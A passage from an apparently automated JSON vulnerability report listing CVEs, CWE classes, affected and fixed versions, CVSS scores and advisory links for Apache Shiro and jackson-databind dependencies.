Users should update to Apache Shiro 1.8.0."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.7.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.8.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raae98bb934e4bde304465896ea02d9798e257e486d04a42221e2c41b@%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re470be1ffea44bca28ccb0e67a4cf5d744e2d2b981d00fdbbf5abc13%40%3Cannounce.shiro.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41303"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41303"},{"summary":"NetApp Advisory ntap-20220609-0001","url":"https://security.netapp.com/advisory/ntap-20220609-0001"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.7.1"]}],"title":"CVE-2021-41303/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-46749"]}],"cve":"CVE-2023-46749","cwe":{"id":"22","name":"Improper 
Limitation of a Pathname to a Restricted Directory"},"discovery_date":"2024-01-15T12:30:19","ids":[{"system_name":"CVE Record","text":"CVE-2023-46749"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro vulnerable to path traversal"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro vulnerable to path traversal Apache Shiro before 1.130 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default)."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.12.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/mdv7ftz7k4488rzloxo2fb0p9shnp9wm"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46749"},{"summary":"Cve 
2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46749"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.12.0"]}],"title":"CVE-2023-46749/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11619"]}],"cve":"CVE-2020-11619","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:44","ids":[{"system_name":"CVE Record","text":"CVE-2020-11619"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"NetApp Advisory","text":"ntap-20200511-0004"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets 
and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11619"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11619"},{"summary":"NetApp Advisory ntap-20200511-0004","url":"https://security.netapp.com/advisory/ntap-20200511-0004"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory 
cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11619/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-25649"]}],"cve":"CVE-2020-25649","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2021-02-18T20:51:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-25649"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210108-0007"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1887664"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"XML External Entity (XXE) Injection in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# XML External Entity (XXE) Injection in Jackson 
Databind A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0.0|<2.9.10.7"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.7"]},"references":[{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1887664"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r011d1430e8f40dff9550c3bc5d0f48b14c01ba8aecabd91d5e495386@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r024b7bda9c43c5560d81238748775c5ecfe01b57280f90df1f773949@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r04529cedaca40c2ff90af4880493f9c88a8ebf4d1d6c861d23108a5a@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0881e23bd9034c8f51fdccdc8f4d085ba985dcd738f8520569ca5c3d@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0b8dc3acd4503e4ecb6fbd6ea7d95f59941168d8452ac0ab1d1d96bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1b7ed0c4b6c4301d4dfd6fdbc5581b0a789d3240cab55d766f33c6c6@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2882fc1f3032cd7be66e28787f04ec6f1874ac68d47e310e30ff7eb1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2b6ddb3a4f4cd11d8f6305011e1b7438ba813511f2e3ab3180c7ffda@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r2eb66c182853c69ecfb52f63d3dec09495e9b65be829fd889a081ae1@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2f5c5479f99398ef344b7ebd4d90bc3316236c45d0f3bc42090efcd7@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r31f4ee7d561d56a0c2c2c6eb1d6ce3e05917ff9654fdbfec05dc2b83@%3Ccommits.servicecomb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3e6ae311842de4e64c5d560a475b7f9cc7e0a9a8649363c6cf7537eb@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r407538adec3185dd35a05c9a26ae2f74425b15132470cf540f41d85b@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r45e7350dfc92bb192f3f88e9971c11ab2be0953cc375be3dda5170bd@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b130fe668503c4b7e2caf1b16f86b7f2070fd1b7ef8f26195a2ffbd@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5f8a1608d758936bd6bbc5eed980777437b611537bf6fff40663fc71@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r605764e05e201db33b3e9c2e66ff620658f07ad74f296abe483f7042@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r63c87aab97155f3f3cbe11d030c4a184ea0de440ee714977db02e956@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r68d029ee74ab0f3b0569d0c05f5688cb45dd3abe96a6534735252805@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a4f3ef6edfed2e0884269d84798f766779bbbc1005f7884e0800d61@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a6df5647583541e3cb71c75141008802f7025cee1c430d4ed78f4cc@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6cbd599b80e787f02ff7a1391d9278a03f37d6a6f4f943f0f01a62fb@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6e3d4f7991542119a4ca6330271d7fbf7b9fb3abab24ada82ddf1ee4@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r73bef1bb601a9f093f915f8075eb49fcca51efade57b817afd5def07@%3Ccommits.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r765283e145049df9b8998f14dcd444345555aae02b1610cfb3188bf8@%3Cnotifications.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r78d53a0a269c18394daf5940105dc8c7f9a2399503c2e78be20abe7e@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7cb5b4b3e4bd41a8042e5725b7285877a17bcbf07f4eb3f7b316af60@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r86c78bf7656fdb2dab69cbf17f3d7492300f771025f1a3a65d5e5ce5@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8764bb835bcb8e311c882ff91dd3949c9824e905e880930be56f6ba3@%3Cuser.spark.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8ae961c80930e2717c75025414ce48a432cea1137c02f648b1fb9524@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r900d4408c4189b376d1ec580ea7740ea6f8710dc2f0b7e9c9eeb5ae0@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90d1e97b0a743cf697d89a792a9b669909cc5a1692d1e0083a22e66c@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91722ecfba688b0c565675f8bf380269fde8ec62b54d6161db544c22@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r94c7e86e546120f157264ba5ba61fd29b3a8d530ed325a9b4fa334d7@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r95a297eb5fd1f2d3a2281f15340e2413f952e9d5503296c3adc7201a@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98bfe3b90ea9408f12c4b447edcb5638703d80bc782430aa0c210a54@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/ra1157e57a01d25e36b0dc17959ace758fc21ba36746de29ba1d8b130@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra409f798a1e5a6652b7097429b388650ccd65fd958cee0b6f69bba00@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra95faf968f3463acb3f31a6fbec31453fc5045325f99f396961886d3@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raf13235de6df1d47a717199e1ecd700dff3236632f5c9a1488d9845b@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb674520b9f6c808c1bf263b1369e14048ec3243615f35cfd24e33604@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc15e90bbef196a5c6c01659e015249d6c9a73581ca9afb8aeecf00d2@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc82ff47853289e9cd17f5cfbb053c04cafc75ee32e3d7223963f83bb@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc88f2fa2b7bd6443921727aeee7704a1fb02433e722e2abf677e0d3d@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc959cdb57c4fe198316130ff4a5ecbf9d680e356032ff2e9f4f05d54@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd317f15a675d114dbf5b488d27eeb2467b4424356b16116eb18a652d@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rd57c7582adc90e233f23f3727db3df9115b27a823b92374f11453f34@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd6f6bf848c2d47fa4a85c27d011d948778b8f7e58ba495968435a0b3@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdca8711bb7aa5d47a44682606cd0ea3497e2e922f22b7ee83e81e6c1@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdf9a34726482222c90d50ae1b9847881de67dde8cfde4999633d2cdc@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re16f81d3ad49a93dd2f0cba9f8fc88e5fb89f30bf9a2ad7b6f3e69c1@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re96dc7a13e13e56190a5d80f9e5440a0d0c83aeec6467b562fbf2dca@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1809a1374041a969d77afab21fc38925de066bc97e86157d3ac3402@%3Ccommits.karaf.apache.org%3E"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6X2UT4X6M7DLQYBOOHMXBWGYJ65RL2CT"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-25649"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-25649"},{"summary":"NetApp Advisory ntap-20210108-0007","url":"https://security.netapp.com/advisory/ntap-20210108-0007"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0.0|<2.9.10.7"]}],"title":"CVE-2020-25649/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-8840"]}],"cve":"CVE-2020-8840","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-03-04T20:52:14","ids":[{"system_name":"CVE Record","text":"CVE-2020-8840"},{"system_name":"Oracle Advisory","text":"cpuapr2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Huawei Advisory","text":"huawei-sa-20200610-01-fastjason-en"},{"system_name":"NetApp Advisory","text":"ntap-20200327-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in jackson-databind FasterXML 
jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5 and 2.9.x before 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.3"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.3"]},"references":[{"summary":"Huawei Advisory huawei-sa-20200610-01-fastjason-en","url":"http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache 
